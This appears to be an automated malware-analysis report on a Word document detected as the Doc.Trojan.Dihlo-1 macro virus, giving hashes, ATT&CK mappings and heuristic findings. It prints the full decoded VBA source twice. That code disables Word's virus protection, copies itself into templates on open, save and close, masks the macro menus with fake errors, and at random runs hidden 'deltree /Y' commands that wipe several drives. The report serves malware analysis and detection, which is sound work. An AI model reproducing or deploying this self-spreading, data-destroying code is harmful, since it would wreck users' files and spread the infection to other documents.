Doc.Trojan.Dihlo-1 Office (OLE) malware analysis — malicious · 139385dffa3af335

MALICIOUS

Office (OLE)

30.0 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: c53f65b636190c8794e78bb7e178c108 SHA-1: 2b0f7269db4c343af79d838967f162f77fc52d87 SHA-256: 139385dffa3af335f6647ba5974cb88abddc801ffc2d1d28f1a8a3f268dfedc3

256 Risk Score

Malware Insights

Doc.Trojan.Dihlo-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1027 Obfuscated Files or Information T1490 Inhibit System Recovery

This document contains legacy WordBasic macro markers and a VBA macro named 'DIHLOFOS'. The AutoOpen and AutoClose subroutines repeatedly call an 'Infect' subroutine, which attempts to copy the macro to other documents and templates. The 'Distructive' subroutine, called under specific conditions, uses Shell commands to attempt deletion of files on C:\ and D:\ drives, indicating an attempt to inhibit system recovery. The presence of legacy macro virus markers and the specific ClamAV detection name strongly suggest the 'Doc.Trojan.Dihlo-1' family.

Heuristics 7

ClamAV: Doc.Trojan.Dihlo-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Dihlo-1
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell "Command.com /c deltree /Y C:\", vbHide
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2099 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2099 bytes
SHA-256: `c72f100016770dfba7f1d63fed71813ca3799e844cf5ad94404bfd618349fbc3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "DIHLOFOS" '************************** ' This is virus * 'Version: 1.0 * ' Name: Dihlofos * ' Autor: Kiselov Maxim * ' Date: 28.06.2001 * 'Made in: Russia * '************************** Sub AutoOpen() Call Infect End Sub Sub ErrorBox() Dim Msg, MSGer, Style, Title Msg = Error(51) Title = "Error 51" Style = 0 + 16 MSGer = MsgBox(Msg, Style, Title) End Sub Sub Infect() On Error Resume Next Dim File$ Dim ThisFile$ Dim MyV Options.VirusProtection = False Options.SaveNormalPrompt = False ThisFile$ = WordBasic.[FileName$]() Set myTemplate = ActiveDocument.AttachedTemplate File$ = myTemplate.Path & Application.PathSeparator & _ myTemplate.Name Application.OrganizerCopy Source:=ThisFile$, Destination:=File$, Name:="DIHLOFOS", Object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=File$, Destination:=ThisFile$, Name:="DIHLOFOS", Object:=wdOrganizerObjectProjectItems MyV = Int((500 * Rnd) + 1) If MyV = 17 Then Call Distructive End Sub Sub ToolsMacro() Call ErrorBox End Sub Sub AutoClose() Call Infect End Sub Sub FileSaveAs() Call Infect Dialogs(wdDialogFileSaveAs).Show End Sub Sub FileSave() Call Infect ActiveDocument.Save End Sub Sub Distructive() On Error Resume Next MsgBox Title:="Virus DIHLOFOS", Prompt:="Ha ha ha ha...You System DEAD!" If Application.UserName = "Киселёв Максим Сергеевич" Then End Shell "Command.com /c deltree /Y C:\", vbHide Shell "Command.com /c deltree /Y D:\", vbHide Shell "Command.com /c deltree /Y E:\", vbHide Shell "Command.com /c deltree /Y A:\", vbHide Shell "Command.com /c deltree /Y B:\", vbHide End Sub Sub ToolsCustomize() Call ErrorBox End Sub Sub ToolsOptions() Call ErrorBox End Sub Sub ViewVbCode() Call ErrorBox End Sub

SHA-256: c72f100016770dfba7f1d63fed71813ca3799e844cf5ad94404bfd618349fbc3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DIHLOFOS"
'**************************
'    This is virus        *
'Version: 1.0             *
'   Name: Dihlofos        *
'  Autor: Kiselov Maxim   *
'   Date: 28.06.2001      *
'Made in: Russia          *
'**************************
Sub AutoOpen()
Call Infect
End Sub
Sub ErrorBox()
Dim Msg, MSGer, Style, Title
Msg = Error(51)
Title = "Error 51"
Style = 0 + 16
MSGer = MsgBox(Msg, Style, Title)
End Sub
Sub Infect()
On Error Resume Next
Dim File$
Dim ThisFile$
Dim MyV
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ThisFile$ = WordBasic.[FileName$]()
Set myTemplate = ActiveDocument.AttachedTemplate
File$ = myTemplate.Path & Application.PathSeparator & _
myTemplate.Name
Application.OrganizerCopy Source:=ThisFile$, Destination:=File$, Name:="DIHLOFOS", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=File$, Destination:=ThisFile$, Name:="DIHLOFOS", Object:=wdOrganizerObjectProjectItems
MyV = Int((500 * Rnd) + 1)
If MyV = 17 Then Call Distructive
End Sub
Sub ToolsMacro()
Call ErrorBox
End Sub
Sub AutoClose()
Call Infect
End Sub
Sub FileSaveAs()
Call Infect
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileSave()
Call Infect
ActiveDocument.Save
End Sub
Sub Distructive()
On Error Resume Next
MsgBox Title:="Virus DIHLOFOS", Prompt:="Ha ha ha ha...You System DEAD!"
If Application.UserName = "Киселёв Максим Сергеевич" Then End
Shell "Command.com /c deltree /Y C:\", vbHide
Shell "Command.com /c deltree /Y D:\", vbHide
Shell "Command.com /c deltree /Y E:\", vbHide
Shell "Command.com /c deltree /Y A:\", vbHide
Shell "Command.com /c deltree /Y B:\", vbHide
End Sub
Sub ToolsCustomize()
Call ErrorBox
End Sub
Sub ToolsOptions()
Call ErrorBox
End Sub
Sub ViewVbCode()
Call ErrorBox
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.